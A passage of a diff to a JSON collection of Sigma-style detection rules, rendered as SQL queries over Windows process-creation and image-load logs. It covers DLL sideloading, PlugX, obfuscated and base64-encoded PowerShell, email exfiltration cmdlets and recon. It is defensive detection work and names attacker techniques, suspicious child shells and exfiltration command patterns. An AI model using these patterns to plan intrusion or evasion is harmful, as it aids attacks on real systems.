LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_malware_griffon_patterns.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", + "id": 
"37db85d1-b089-490a-a59a-c7b6f984f480", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Shells Spawn by Java Utility Keytool", + "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "status": "experimental", + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ + "attack.initial_access", "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.privilege_escalation" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_java_keytool_susp_child_process.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Base64 MZ Header In CommandLine", + "id": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "status": "experimental", + "description": "Detects encoded base64 MZ header in the commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR CommandLine LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR CommandLine LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR CommandLine LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_susp_inline_base64_mz_header.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential PlugX Activity", + "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "status": 
"test", + "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.s0013", "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR 
(NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "PowerShell Base64 Encoded WMI Classes", + "id": "1816994b-42e1-4fb1-afd2-134d88184f71", "status": "experimental", - 
"description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"Win32_ScheduledJob\", etc.", + "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR 
CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential PowerShell Obfuscation Via Reversed Commands", + "id": 
"b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", + "status": "test", + "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT 
((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", - "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "title": "Email Exifiltration Via Powershell", + "id": "312d0384-401c-4b8b-abdf-685ffba9a332", + "status": "experimental", + "description": "Detects email exfiltration via powershell cmdlets", + "author": "Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.exfiltration" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND CommandLine LIKE '%Get-Recipient%' ESCAPE '\\' AND CommandLine LIKE '%-ExpandProperty%' ESCAPE '\\' AND CommandLine LIKE '%EmailAddresses%' ESCAPE '\\' AND CommandLine LIKE '%SmtpAddress%' ESCAPE '\\' AND CommandLine LIKE '%-hidetableheaders%' ESCAPE '\\')" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_powershell_email_exfil.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Network Reconnaissance Activity", + "id": 
"e6313acd-208c-44fc-a0ff-db85d572e90e", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "Detects a set of suspicious network related commands often used in recon stages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_nslookup_domain_discovery.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "title": "Abuse of Service Permissions to Hide Services Via Set-Service", + "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects usage of the \"Set-Service\" 
powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "title": "PUA - NPS Tunneling Tool Execution", + "id": "68d37776-61db-42f5-bf54-27e87072d17e", "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to 
sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_pua_nps.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Wusa Extracting Cab Files From Suspicious Paths", + "id": "c74c0390-3e20-41fd-a69a-128f0275a5ea", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone 
Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 